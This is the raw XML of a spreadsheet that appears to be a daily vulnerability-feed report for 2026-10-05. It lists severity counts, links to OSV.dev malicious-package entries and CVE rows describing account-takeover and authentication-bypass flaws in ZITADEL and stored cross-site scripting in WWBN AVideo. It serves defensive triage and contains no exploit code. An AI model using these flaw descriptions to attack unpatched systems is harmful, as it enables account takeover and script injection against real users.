<file path=xl/worksheets/_rels/sheet9.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17343" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17383" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17404" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17405" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17472" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17473" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17474" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17475" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17476" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17477" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17478" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17479" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17480" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17481" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17482" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17483" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17484" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17485" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17486" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17487" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17488" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17489" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17490" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17491" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17492" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17493" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17494" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17495" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17496" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17497" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17498" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17499" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17500" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17501" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17502" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17503" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17504" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17505" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17506" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17507" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17508" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17509" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17510" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17511" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17512" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17513" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17514" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17515" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17516" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17517" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17518" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17519" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17520" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17521" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17522" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17523" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17524" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17525" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17526" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17527" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17528" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17529" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17530" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17531" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17532" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17533" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17534" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17535" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17536" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17537" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17538" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17539" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17540" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17541" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17542" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17543" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17544" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17545" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17546" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17547" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17548" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17549" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17550" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17551" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17552" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17553" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17554" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17555" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17556" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17557" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17558" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17559" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17560" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17561" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17562" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17563" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17564" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17565" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17566" TargetMode="External" Id="rId99"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2026-10-05</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="2" t="inlineStr">
        <is>
          <t>Window (UTC)</t>
        </is>
      </c>
      <c r="B3" s="3" t="inlineStr">
        <is>
          <t>2026-10-04T07:29 to 2026-10-05T07:29</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="2" t="inlineStr">
        <is>
          <t>Generated</t>
        </is>
      </c>
      <c r="B4" s="3" t="inlineStr">
        <is>
          <t>2026-10-05 07:29:31 UTC</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="2" t="inlineStr"/>
      <c r="B5" s="3" t="inlineStr"/>
    </row>
    <row r="6">
      <c r="A6" s="2" t="inlineStr">
        <is>
          <t>Total entries</t>
        </is>
      </c>
      <c r="B6" s="3" t="n">
        <v>223</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  New - published today</t>
        </is>
      </c>
      <c r="B7" s="3" t="n">
        <v>222</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Significant updates</t>
        </is>
      </c>
      <c r="B8" s="3" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Added to CISA KEV</t>
        </is>
      </c>
      <c r="B9" s="3" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="2" t="inlineStr">
        <is>
          <t>In CISA KEV</t>
        </is>
      </c>
      <c r="B10" s="3" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="2" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="B11" s="3" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="2" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="B12" s="3" t="n">
        <v>42</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="2" t="inlineStr">
        <is>
          <t>Medium</t>
        </is>
      </c>
      <c r="B13" s="3" t="n">
        <v>31</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="2" t="inlineStr">
        <is>
          <t>Low</t>
        </is>
      </c>
      <c r="B14" s="3" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="2" t="inlineStr">
        <is>
          <t>Unscored</t>
        </is>
      </c>
      <c r="B15" s="3" t="n">
        <v>137</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="2" t="inlineStr">
        <is>
          <t>Watchlist matches</t>
        </is>
      </c>
      <c r="B16" s="3" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="2" t="inlineStr">
        <is>
          <t>From GitHub Advisories</t>
        </is>
      </c>
      <c r="B17" s="3" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="2" t="inlineStr">
        <is>
          <t>From OSV.dev</t>
        </is>
      </c>
      <c r="B18" s="3" t="n">
        <v>99</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CVE-2026-105207</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>ZITADEL 3.0.0 through 3.4.15 and 4.0.0 before 4.17.3 creates links between user accounts and external identity providers without verifying a primary factor or the caller's permission, including on identify-only Login V2 sessions and via the User Service V2 AddIDPLink endpoint. An unauthenticated attacker knowing a victim's login name can bind their own external IdP identity to the victim's account and then sign in as the victim.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105207</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105209</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>9.6</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2026-10-04</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>ZITADEL 3.x before 3.4.15 and 4.x before 4.17.1 contains an improper authorization vulnerability: when issuing passkey or passwordless enrollment codes, it checks only the organization in the x-zitadel-orgid header, not the target user's organization. Attackers with user-write permission in one organization can obtain an enrollment code for a user in another organization on the same instance and register their own authenticator to take over that account.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105209</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103355</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S4"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4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103355</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105215</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>ZITADEL before 3.4.14 and 4.x before 4.16.2 contains an authentication bypass in the hosted Login V1 UI because the 'external account not found' registration endpoint trusts client-supplied external identity fields without a completed IdP callback. Unauthenticated attackers can submit forged IDPConfigID and ExternalUserID values to pre-create an account bound to a victim's external IdP identity, which the victim's later genuine external login then signs into.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105215</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105086</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>8.699999999999999</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CWE-79</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo 12.4 through 29.2.0 contains a stored cross-site scripting vulnerability that allows authenticated uploaders to inject HTML by submitting doubly-encoded entities in video titles. Because safeString() strips tags before decoding entities and runs twice via setTitle() and save(), attackers can store markup that executes in trending, gallery, embed, and playlist pages.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105086</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105089</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through 29.2.0 contains a stored cross-site scripting vulnerability that allows users with upload permission to inject script by setting a malicious video trailer1 URL. The value is rendered unescaped in YouPHPFlix2 templates and channel playlists, letting attackers break out of onclick strings or iframe src attributes to execute JavaScript in victims' browsers.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105089</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105210</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
